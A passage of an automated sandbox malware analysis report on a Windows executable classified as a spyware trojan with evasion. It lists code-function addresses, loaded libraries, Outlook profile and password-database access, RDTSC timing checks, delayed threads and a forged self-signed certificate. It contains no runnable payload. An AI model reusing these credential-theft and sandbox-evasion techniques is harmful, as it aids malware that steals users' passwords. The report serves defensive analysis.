            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E7FB88_2_361E7FB8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ED5B78_2_361ED5B7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E54B08_2_361E54B0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EEDB08_2_361EEDB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EAAB08_2_361EAAB0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E2DA88_2_361E2DA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EC2A88_2_361EC2A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E0DA98_2_361E0DA9
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E7FA78_2_361E7FA7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E97A08_2_361E97A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E54A18_2_361E54A1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E16D88_2_361E16D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E92D88_2_361E92D8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E3FD88_2_361E3FD8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EE8D98_2_361EE8D9
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E4FD78_2_361E4FD7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EBDD28_2_361EBDD2
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E67D08_2_361E67D0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E16CA8_2_361E16CA
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E36C88_2_361E36C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ED5C88_2_361ED5C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E92C78_2_361E92C7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EAAC08_2_361EAAC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E62FA8_2_361E62FA
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E1FF88_2_361E1FF8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EA5F88_2_361EA5F8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E7AF08_2_361E7AF0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361ED0F08_2_361ED0F0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E3FE88_2_361E3FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EE8E88_2_361EE8E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E1FE88_2_361E1FE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EA5E88_2_361EA5E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361EBDE08_2_361EBDE0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_361E7AE18_2_361E7AE1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620BE108_2_3620BE10
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620F5A08_2_3620F5A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362057C08_2_362057C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362048208_2_36204820
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362016208_2_36201620
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620F2288_2_3620F228
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36202C008_2_36202C00
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362048108_2_36204810
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362000158_2_36200015
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620F21A8_2_3620F21A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36204E608_2_36204E60
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36201C608_2_36201C60
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362032408_2_36203240
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362000408_2_36200040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362054A08_2_362054A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362022A08_2_362022A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362038808_2_36203880
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362006808_2_36200680
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362092818_2_36209281
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362028E08_2_362028E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36203EC08_2_36203EC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36200CC08_2_36200CC0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36202F208_2_36202F20
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620D5388_2_3620D538
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362045008_2_36204500
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362013008_2_36201300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362035608_2_36203560
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362003608_2_36200360
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362051708_2_36205170
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36204B408_2_36204B40
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362019408_2_36201940
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36203BA08_2_36203BA0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362009A08_2_362009A0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36201F808_2_36201F80
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362051808_2_36205180
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620E78A8_2_3620E78A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620F5908_2_3620F590
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3620E7988_2_3620E798
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362041E08_2_362041E0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36200FE08_2_36200FE0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362025C08_2_362025C0
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E6688_2_3621E668
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36216C888_2_36216C88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362105088_2_36210508
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E3488_2_3621E348
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362100268_2_36210026
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E0288_2_3621E028
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36217C288_2_36217C28
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621AE288_2_3621AE28
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621F6088_2_3621F608
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621C4088_2_3621C408
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362192088_2_36219208
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621AE1A8_2_3621AE1A
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362182688_2_36218268
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621B4688_2_3621B468
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362100408_2_36210040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621FC488_2_3621FC48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621CA488_2_3621CA48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362198488_2_36219848
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621ECA88_2_3621ECA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362188A88_2_362188A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621BAA88_2_3621BAA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D0888_2_3621D088
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36219E888_2_36219E88
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362188988_2_36218898
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621EC988_2_3621EC98
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621F2E88_2_3621F2E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621C0E88_2_3621C0E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36218EE88_2_36218EE8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362104F78_2_362104F7
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D6C88_2_3621D6C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362172C88_2_362172C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621A4C88_2_3621A4C8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621F9288_2_3621F928
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621C7288_2_3621C728
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362195288_2_36219528
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36212D308_2_36212D30
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621DD088_2_3621DD08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362179088_2_36217908
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621AB088_2_3621AB08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621CD688_2_3621CD68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36219B688_2_36219B68
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E9788_2_3621E978
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36217F488_2_36217F48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621B1488_2_3621B148
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D3A88_2_3621D3A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36216FA88_2_36216FA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621A1A88_2_3621A1A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E9888_2_3621E988
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621B7888_2_3621B788
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362185888_2_36218588
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D3978_2_3621D397
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D9E88_2_3621D9E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362175E88_2_362175E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621A7E88_2_3621A7E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621EFC88_2_3621EFC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36218BC88_2_36218BC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621BDC88_2_3621BDC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362415308_2_36241530
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36241C188_2_36241C18
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362407608_2_36240760
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362423008_2_36242300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362400408_2_36240040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36240E488_2_36240E48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362415218_2_36241521
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36241C088_2_36241C08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362407508_2_36240750
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362422F18_2_362422F1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362400068_2_36240006
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36240E388_2_36240E38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: String function: 00402DAB appears 51 times
            Source: OW1i3n5K3s.exe | Static PE information: invalid certificate
            Source: OW1i3n5K3s.exe, 00000008.00000002.2504810800.0000000032C77000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs OW1i3n5K3s.exe
            Source: OW1i3n5K3s.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/15@5/5
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_004021AF CoCreateInstance
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File created: C:\Users\user\AppData\Local\interdifferentiate
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Mutant created: NULL
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File created: C:\Users\user\AppData\Local\Temp\nsd77B1.tmp
            Source: OW1i3n5K3s.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.00000000330E2000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.00000000330F2000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033100000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: OW1i3n5K3s.exe | Virustotal: Detection: 74%
            Source: OW1i3n5K3s.exe | ReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File read: C:\Users\user\Desktop\OW1i3n5K3s.exe
            Source: unknown | Process created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Process created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Process created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: purifier.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: profapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: winhttp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: winnsi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: schannel.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: mskeyprotect.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: ntasn1.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: dpapi.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile written: C:\Users\user\AppData\Local\interdifferentiate\Elicitate\Stabs171.iniJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: OW1i3n5K3s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: Yara match | File source: 00000008.00000002.2476092324.000000000186B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.1342316405.00000000053BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_6EDC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_6EDC1BFF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 1_2_6EDC30C0 push eax; ret 1_2_6EDC30EE
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Code function: 8_2_02589C30 push esp; retf 025Ah 8_2_02589D55

            Persistence and Installation Behavior

            Source: Initial sample | Joe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject) which is not trusted by system providers 2) Organization 'Digitoxigenin' is not a known legitimate company 3) Email domain 'Forholdstalsvalg.Sny' appears randomly generated and non-standard 4) Organizational Unit contains strange concatenated words that don't make business sense 5) Compilation timestamp (July 2023) is significantly older than certificate creation (Sept 2024), suggesting possible certificate manipulation 6) While GB location is generally lower risk, other certificate elements strongly suggest this is being used as a false front 7) Invalid signature validation further confirms certificate cannot be trusted. The combination of a self-signed certificate, suspicious organization details, and invalid signature validation strongly suggests this is a malicious attempt to appear legitimate.
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | File created: C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dll
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | API/Special instruction interceptor: Address: 5924383
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | API/Special instruction interceptor: Address: 1DD4383
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | RDTSC instruction interceptor: First address: 58E05E6 second address: 58E05E6 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4E0948F3F4h 0x00000008 test al, dl 0x0000000a test edx, ebx 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | RDTSC instruction interceptor: First address: 1D905E6 second address: 1D905E6 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4E08BB4F84h 0x00000008 test al, dl 0x0000000a test edx, ebx 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Memory allocated: 2530000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Memory allocated: 32E80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Memory allocated: 32C80000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exe | Thread delayed: delay time: 600000
